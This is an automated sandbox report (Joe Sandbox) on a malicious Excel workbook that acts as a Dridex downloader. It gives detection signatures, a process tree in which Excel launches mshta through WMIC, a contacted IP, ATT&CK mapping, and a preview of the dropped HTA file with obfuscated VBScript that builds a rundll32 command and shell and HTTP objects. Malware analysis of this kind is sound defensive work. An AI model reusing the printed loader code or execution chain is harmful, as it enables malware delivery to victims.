Loading ...

Play interactive tourEdit tour

Windows Analysis Report 942830.xlsb

Overview

General Information

Sample Name:942830.xlsb
Analysis ID:528106
MD5:1d439288755abe01c8e0b84351a1adf3
SHA1:3db8730627a0fc4faa83e348e7e25d9ab9b81cb7
SHA256:72c5559bc575d4f5527babe24331374e5d319362e96e1078d35179aceea41941
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Dridex Downloader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Dridex Downloader
Multi AV Scanner detection for submitted file
Found malicious Excel 4.0 Macro
Creates and opens a fake document (probably a fake document to hide exploiting)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Creates processes via WMI
Document exploit detected (UrlDownloadToFile)
Found protected and hidden Excel 4.0 Macro sheet
Contains functionality to create processes via WMI
Found obfuscated Excel 4.0 Macro
Queries the volume information (name, serial number etc) of a device
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
May sleep (evasive loops) to hinder dynamic analysis
Yara detected Xls With Macro 4.0
Detected TCP or UDP traffic on non-standard ports
Sigma detected: Suspicious WMI Execution
Creates a window with clipboard capturing capabilities
IP address seen in connection with other malware

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2580 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • WMIC.exe (PID: 1528 cmdline: wmic process call create "mshta C:\ProgramData\EvbrPIaoQqom.rtf" MD5: FD902835DEAEF4091799287736F3A028)
  • mshta.exe (PID: 1156 cmdline: mshta C:\ProgramData\EvbrPIaoQqom.rtf MD5: 95828D670CFD3B16EE188168E083C3C5)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\ProgramData\EvbrPIaoQqom.rtfJoeSecurity_DridexDownloaderYara detected Dridex DownloaderJoe Security

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: wmic process call create "mshta C:\ProgramData\EvbrPIaoQqom.rtf", CommandLine: wmic process call create "mshta C:\ProgramData\EvbrPIaoQqom.rtf", CommandLine|base64offset|contains: h, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2580, ProcessCommandLine: wmic process call create "mshta C:\ProgramData\EvbrPIaoQqom.rtf", ProcessId: 1528
      Sigma detected: Suspicious WMI ExecutionShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, juju4, oscd.community: Data: Command: wmic process call create "mshta C:\ProgramData\EvbrPIaoQqom.rtf", CommandLine: wmic process call create "mshta C:\ProgramData\EvbrPIaoQqom.rtf", CommandLine|base64offset|contains: h, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2580, ProcessCommandLine: wmic process call create "mshta C:\ProgramData\EvbrPIaoQqom.rtf", ProcessId: 1528

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Multi AV Scanner detection for submitted fileShow sources
      Source: 942830.xlsbVirustotal: Detection: 8%Perma Link
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

      Software Vulnerabilities:

      barindex
      Document exploit detected (process start blacklist hit)Show sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\wbem\WMIC.exe
      Document exploit detected (UrlDownloadToFile)Show sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 136.144.181.174:8080
      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 136.144.181.174:8080
      Source: Joe Sandbox ViewIP Address: 136.144.181.174 136.144.181.174
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.181.174
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.181.174
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.181.174
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.181.174
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.181.174
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.181.174
      Source: mshta.exe, 00000005.00000002.673902220.0000000003990000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
      Source: mshta.exe, 00000005.00000002.673902220.0000000003990000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
      Source: mshta.exe, 00000005.00000002.673902220.0000000003990000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
      Source: mshta.exe, 00000005.00000002.674064912.0000000003B77000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
      Source: mshta.exe, 00000005.00000002.674064912.0000000003B77000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
      Source: mshta.exe, 00000005.00000002.674257611.0000000003D70000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
      Source: WMIC.exe, 00000002.00000002.456772383.0000000001CA0000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
      Source: mshta.exe, 00000005.00000002.674064912.0000000003B77000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
      Source: mshta.exe, 00000005.00000002.674064912.0000000003B77000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
      Source: mshta.exe, 00000005.00000002.674257611.0000000003D70000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
      Source: mshta.exe, 00000005.00000002.673902220.0000000003990000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
      Source: mshta.exe, 00000005.00000002.674064912.0000000003B77000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
      Source: mshta.exe, 00000005.00000002.673902220.0000000003990000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
      Source: mshta.exe, 00000005.00000002.673902220.0000000003990000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DA1F7DD.pngJump to behavior
      Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASS

      E-Banking Fraud:

      barindex
      Yara detected Dridex DownloaderShow sources
      Source: Yara matchFile source: C:\ProgramData\EvbrPIaoQqom.rtf, type: DROPPED

      System Summary:

      barindex
      Found malicious Excel 4.0 MacroShow sources
      Source: 942830.xlsbMacro extractor: Sheet: Macro1 contains: mshta
      Found Excel 4.0 Macro with suspicious formulasShow sources
      Source: 942830.xlsbInitial sample: EXEC
      Found protected and hidden Excel 4.0 Macro sheetShow sources
      Source: 942830.xlsbInitial sample: Sheet name: Macro1
      Contains functionality to create processes via WMIShow sources
      Source: WMIC.exe, 00000002.00000002.456664618.0000000000380000.00000004.00000020.sdmpBinary or memory string: C:\Users\user\Documents\C:\Windows\System32\Wbem;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\System32\Wbem\wmic.exewmic process call create "mshta C:\ProgramData\EvbrPIaoQqom.rtf"C:\Windows\System32\Wbem\wmic.exeWinSta0\Default<
      Found obfuscated Excel 4.0 MacroShow sources
      Source: 942830.xlsbMacro extractor: Sheet: Macro1 high usage of CHAR() function: 46
      Source: 942830.xlsbMacro extractor: Sheet name: Macro1
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
      Source: 942830.xlsbVirustotal: Detection: 8%
      Source: C:\Windows\System32\wbem\WMIC.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "mshta C:\ProgramData\EvbrPIaoQqom.rtf"
      Source: unknownProcess created: C:\Windows\System32\mshta.exe mshta C:\ProgramData\EvbrPIaoQqom.rtf
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "mshta C:\ProgramData\EvbrPIaoQqom.rtf"
      Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
      Source: mshta.exe, 00000005.00000002.673902220.0000000003990000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$942830.xlsbJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRDE3D.tmpJump to behavior
      Source: classification engineClassification label: mal100.troj.expl.evad.winXLSB@4/4@0/1
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: 942830.xlsbInitial sample: OLE zip file path = xl/media/image2.png
      Source: 942830.xlsbInitial sample: OLE zip file path = xl/media/image1.png
      Source: 942830.xlsbInitial sample: OLE zip file path = docProps/custom.xml
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

      Persistence and Installation Behavior:

      barindex
      Creates processes via WMIShow sources
      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

      Hooking and other Techniques for Hiding and Protection:

      barindex
      Creates and opens a fake document (probably a fake document to hide exploiting)Show sources
      Source: unknownProcess created: cmd line: evbrpiaoqqom.rtf
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: cmd line: evbrpiaoqqom.rtf
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wbem\WMIC.exe TID: 1960Thread sleep time: -120000s >= -30000s
      Source: C:\Windows\System32\wbem\WMIC.exe TID: 1960Thread sleep time: -60000s >= -30000s
      Source: C:\Windows\System32\mshta.exe TID: 1664Thread sleep time: -60000s >= -30000s
      Source: Yara matchFile source: app.xml, type: SAMPLE
      Source: mshta.exe, 00000005.00000002.673597194.0000000001210000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
      Source: mshta.exe, 00000005.00000002.673597194.0000000001210000.00000002.00020000.sdmpBinary or memory string: !Progman
      Source: mshta.exe, 00000005.00000002.673597194.0000000001210000.00000002.00020000.sdmpBinary or memory string: Program Manager<
      Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
      Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
      Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsWindows Management Instrumentation21Path InterceptionProcess Injection2Masquerading1OS Credential DumpingVirtualization/Sandbox Evasion1Remote ServicesEmail Collection1Exfiltration Over Other Network MediumNon-Standard Port1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScripting4Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion1LSASS MemoryProcess Discovery1Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsExploitation for Client Execution31Logon Script (Windows)Logon Script (Windows)Process Injection2Security Account ManagerFile and Directory Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting4NTDSSystem Information Discovery15Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      942830.xlsb8%VirustotalBrowse

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://www.%s.comPA0%URL Reputationsafe
      http://www.icra.org/vocabulary/.0%URL Reputationsafe
      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
      http://servername/isapibackend.dll0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      No contacted domains info

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkmshta.exe, 00000005.00000002.674064912.0000000003B77000.00000002.00020000.sdmpfalse
        high
        http://www.windows.com/pctv.mshta.exe, 00000005.00000002.673902220.0000000003990000.00000002.00020000.sdmpfalse
          high
          http://investor.msn.commshta.exe, 00000005.00000002.673902220.0000000003990000.00000002.00020000.sdmpfalse
            high
            http://www.msnbc.com/news/ticker.txtmshta.exe, 00000005.00000002.673902220.0000000003990000.00000002.00020000.sdmpfalse
              high
              http://www.%s.comPAmshta.exe, 00000005.00000002.674257611.0000000003D70000.00000002.00020000.sdmpfalse
              • URL Reputation: safe
              low
              http://www.icra.org/vocabulary/.mshta.exe, 00000005.00000002.674064912.0000000003B77000.00000002.00020000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.mshta.exe, 00000005.00000002.674257611.0000000003D70000.00000002.00020000.sdmpfalse
                high
                http://windowsmedia.com/redir/services.asp?WMPFriendly=truemshta.exe, 00000005.00000002.674064912.0000000003B77000.00000002.00020000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://www.hotmail.com/oemshta.exe, 00000005.00000002.673902220.0000000003990000.00000002.00020000.sdmpfalse
                  high
                  http://servername/isapibackend.dllWMIC.exe, 00000002.00000002.456772383.0000000001CA0000.00000002.00020000.sdmpfalse
                  • Avira URL Cloud: safe
                  low
                  http://investor.msn.com/mshta.exe, 00000005.00000002.673902220.0000000003990000.00000002.00020000.sdmpfalse
                    high

                    Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public

                    IPDomainCountryFlagASNASN NameMalicious
                    136.144.181.174
                    unknownNetherlands
                    20857TRANSIP-ASAmsterdamtheNetherlandsNLfalse

                    General Information

                    Joe Sandbox Version:34.0.0 Boulder Opal
                    Analysis ID:528106
                    Start date:24.11.2021
                    Start time:19:00:46
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 5m 25s
                    Hypervisor based Inspection enabled:false
                    Report type:light
                    Sample file name:942830.xlsb
                    Cookbook file name:defaultwindowsofficecookbook.jbs
                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                    Number of analysed new started processes analysed:8
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal100.troj.expl.evad.winXLSB@4/4@0/1
                    EGA Information:Failed
                    HDC Information:Failed
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Adjust boot time
                    • Enable AMSI
                    • Found application associated with file extension: .xlsb
                    • Found Word or Excel or PowerPoint or XPS Viewer
                    • Attach to Office via COM
                    • Active AutoShape Object
                    • Active Picture Object
                    • Active Picture Object
                    • Scroll down
                    • Close Viewer
                    Warnings:
                    Show All
                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtSetInformationFile calls found.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    19:01:41API Interceptor12x Sleep call for process: WMIC.exe modified
                    19:01:42API Interceptor452x Sleep call for process: mshta.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    136.144.181.174promo code83874071.xlsbGet hashmaliciousBrowse
                      promo code83874071.xlsbGet hashmaliciousBrowse
                        vote number3210109.xlsbGet hashmaliciousBrowse
                          tax77567960.xlsbGet hashmaliciousBrowse
                            hunting license-25331.xlsbGet hashmaliciousBrowse
                              vote number3210109.xlsbGet hashmaliciousBrowse
                                tax77567960.xlsbGet hashmaliciousBrowse
                                  subscription-84799.xlsbGet hashmaliciousBrowse
                                    hunting license-25331.xlsbGet hashmaliciousBrowse
                                      subscription-84799.xlsbGet hashmaliciousBrowse
                                        8993268.xlsbGet hashmaliciousBrowse
                                          promo 2352017.xlsbGet hashmaliciousBrowse
                                            8993268.xlsbGet hashmaliciousBrowse
                                              promo 2352017.xlsbGet hashmaliciousBrowse
                                                Offer 373466695.xlsbGet hashmaliciousBrowse
                                                  Offer 373466695.xlsbGet hashmaliciousBrowse
                                                    9049521.xlsbGet hashmaliciousBrowse
                                                      9049521.xlsbGet hashmaliciousBrowse

                                                        Domains

                                                        No context

                                                        ASN

                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                        TRANSIP-ASAmsterdamtheNetherlandsNLpromo code83874071.xlsbGet hashmaliciousBrowse
                                                        • 136.144.181.174
                                                        promo code83874071.xlsbGet hashmaliciousBrowse
                                                        • 136.144.181.174
                                                        vote number3210109.xlsbGet hashmaliciousBrowse
                                                        • 136.144.181.174
                                                        tax77567960.xlsbGet hashmaliciousBrowse
                                                        • 136.144.181.174
                                                        hunting license-25331.xlsbGet hashmaliciousBrowse
                                                        • 136.144.181.174
                                                        vote number3210109.xlsbGet hashmaliciousBrowse
                                                        • 136.144.181.174
                                                        tax77567960.xlsbGet hashmaliciousBrowse
                                                        • 136.144.181.174
                                                        subscription-84799.xlsbGet hashmaliciousBrowse
                                                        • 136.144.181.174
                                                        hunting license-25331.xlsbGet hashmaliciousBrowse
                                                        • 136.144.181.174
                                                        subscription-84799.xlsbGet hashmaliciousBrowse
                                                        • 136.144.181.174
                                                        8993268.xlsbGet hashmaliciousBrowse
                                                        • 136.144.181.174
                                                        promo 2352017.xlsbGet hashmaliciousBrowse
                                                        • 136.144.181.174
                                                        8993268.xlsbGet hashmaliciousBrowse
                                                        • 136.144.181.174
                                                        promo 2352017.xlsbGet hashmaliciousBrowse
                                                        • 136.144.181.174
                                                        Offer 373466695.xlsbGet hashmaliciousBrowse
                                                        • 136.144.181.174
                                                        Offer 373466695.xlsbGet hashmaliciousBrowse
                                                        • 136.144.181.174
                                                        9049521.xlsbGet hashmaliciousBrowse
                                                        • 136.144.181.174
                                                        9049521.xlsbGet hashmaliciousBrowse
                                                        • 136.144.181.174
                                                        arm6-20211124-0649Get hashmaliciousBrowse
                                                        • 37.97.150.92
                                                        4VsoRulf3zGet hashmaliciousBrowse
                                                        • 95.170.75.156

                                                        JA3 Fingerprints

                                                        No context

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        C:\ProgramData\EvbrPIaoQqom.rtf
                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):4990
                                                        Entropy (8bit):5.068599092922693
                                                        Encrypted:false
                                                        SSDEEP:96:bn7txHHP2+qxRlRkdd+/WiZZfPyQZygDwu4yRvddbEBhohP7:lxHvuxRlRkdc/bZMQZy1Qldj
                                                        MD5:265D66A0CA80A3A143F0B500D145BDF2
                                                        SHA1:AE4F5D109A26131099F5514795388E7F43F3612F
                                                        SHA-256:C08069CED61FDB75C931C27940BB43903E50A5B5D2F047B9779AE173E2D47CE9
                                                        SHA-512:D44888266776AB16DF360C23F58F3A37E40696F5565B824344A3D31F878BEB663325349A72A4942D9740BA05F5E876142CFE11C1B57846F546FF82A856401492
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_DridexDownloader, Description: Yara detected Dridex Downloader, Source: C:\ProgramData\EvbrPIaoQqom.rtf, Author: Joe Security
                                                        Reputation:low
                                                        Preview: <!DOCTYPE html>..<html>..<head>..<HTA:APPLICATION ID="CS"..APPLICATIONNAME="ttrgnkrtegjtjgjerg"..WINDOWSTATE="minimize"..MAXIMIZEBUTTON="no"..MINIMIZEBUTTON="no"..CAPTION="no"..SHOWINTASKBAR="no">..<script type="text/vbscript" LANGUAGE="VBScript" >..j_P_g_k_U_V_K_U_X_O_a_C_U_b = "ru" & Chr(110+1-1) & "dl" & Chr(108+1-1) & Chr(51+1-1) & Chr(50+1-1) & Chr(46+1-1) & "exe" & " C:" & "\\" & "" & "Pr" & "ogr" & "amD" & Chr(97+1-1) & "ta\" & Chr(113+1-1) & "ep" & "nig" & "ger" & ".bi" & "n D" & "llR" & "eg" & "ist" & "" & "erS" & Chr(101+1-1) & "rve" & Chr(114+1-1) & ""..Set s_Q_Q_x_X_t_p_C_p_A = CreateObject("MS" & "XML" & "" & Chr(50+1-1) & Chr(46+1-1) & "Se" & "" & "" & "rve" & Chr(114+1-1) & Chr(88+1-1) & "" & Chr(77+1-1) & "LH" & Chr(84+1-1) & "TP" & ".6" & ".0" & "" & "")....P_E_S_n_C_O_X_P_C_U_k_p_p_X_W = "Wsc" & "rip" & "" & "" & Chr(116+1-1) & Chr(46+1-1) & "" & "" & Chr(83+1-1) & "" & "he" & "" & "ll"..Set v_l_F_J_A_N_r_k_G_B_R_Z_Y_K_f = CreateObject(P_E_S_n_C_O_X_P_C_U_k_p_p_X_W)..
                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6E90A43A.png
                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        File Type:PNG image data, 238 x 337, 8-bit/color RGBA, non-interlaced
                                                        Category:dropped
                                                        Size (bytes):38157
                                                        Entropy (8bit):7.96137177194393
                                                        Encrypted:false
                                                        SSDEEP:768:7PiEGNOfxgpvUM7w1phhsL+ZfBwnTV+YoS2bUoMokqk++yd6OAd/r:7PFwJpvc1e+BwT8YIbDMz+1d6xt
                                                        MD5:B88B9DF024814E6C791FDAC471ABD26C
                                                        SHA1:6FB92BB20F7A51B40E03467C2EBB217A8E21E21A
                                                        SHA-256:02F3AB917A42A10560A274A9CD91FDA01D7BC428C7428CCAF8CCFF1F46DEA39F
                                                        SHA-512:67E6B7FAE7476847835E5A1F17FBFA60DC35B2AAC299A025102540BBA72D8A3CC120FA69E172FBADE6A4B68F464A98005FC38145CC618A6DC45D8C058F704E9E
                                                        Malicious:false
                                                        Reputation:moderate, very likely benign file
                                                        Preview: .PNG........IHDR.......Q.....s..6...JiCCPICC Profile..x..W.TS...[RIh..H...R.K..E..*..I ...D....]D@].U.E...ZQ...]......l..I.]=...s........{g...I.....y.|Y|D.kBj.......Z...x|...........7..../.(......'.... q.g...<......|..>Po=#_.. 6...!.*q...(q..W.l..9....L..dY.h7C=....y.o@.*..%..!..x..#!...7M...p...'....C.<^..V..r.X.....?..%/W1...6.H.......F.(%.A.#...X..wb...b.*RD&..QS...k.....x.Q..B......32..\...A....D..EByX...F6->v.g.8l....L.Wi.R.............D.).1j.89.bm...(..fS$.........m ..J"B...LYx..^.'...[$.sc4.*_........7..Y(a'.......s..C..c...$M.X.4?$^3..47Nc.S...J......\<0..H5?.#.KT.gd......A4..P....2.4....=M=.z$....d.!p.h.g..F$...._...|h^.jT.....V.t..........<..r.o.j.d.[2x.5...a...)...&Z.Q..t.-.a.Pb$1.....?.......>..`._..........N...b.7...8..=.kr..:g...z.!x...8.7...h..A.P..D...[....U.5v.W.J.F..8|;S.I.s.EY.+..5c.....o.s.....Q.Zb..}X.v.;.....;.5c..J<....V..xU<9.G..?....r.z.n..|a....8.3e.,Q>....B.W..9........;.~M.b.......]q............8........Z..
                                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DA1F7DD.png
                                                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                        File Type:PNG image data, 279 x 60, 8-bit/color RGB, non-interlaced
                                                        Category:dropped
                                                        Size (bytes):2191
                                                        Entropy (8bit):7.825535416775479
                                                        Encrypted:false
                                                        SSDEEP:48:ydXGZOauq4oTWmLUDhRHcfr1kqg0BDEqUZCVVQdqc:WapRkR8J3BDEqUAVsqc
                                                        MD5:8EF98D9F0FDB8A20B48077024D27D012
                                                        SHA1:8CE6F554A30C1CEBF90C40B63CA0E9BCF66F09EB
                                                        SHA-256:02A68CA10C3C190B4B9591B5E83AB2E64DF22EEE80B6D37163A01B40AC84C835
                                                        SHA-512:12175DCCD8C65F0755B960A46A282E61A21398C77B623724F75B03FF7E0CAB3FECD4D126173E48FF582567F11C7626A89D61B90149833D7BA4A84949278D5E8D
                                                        Malicious:false
                                                        Reputation:low
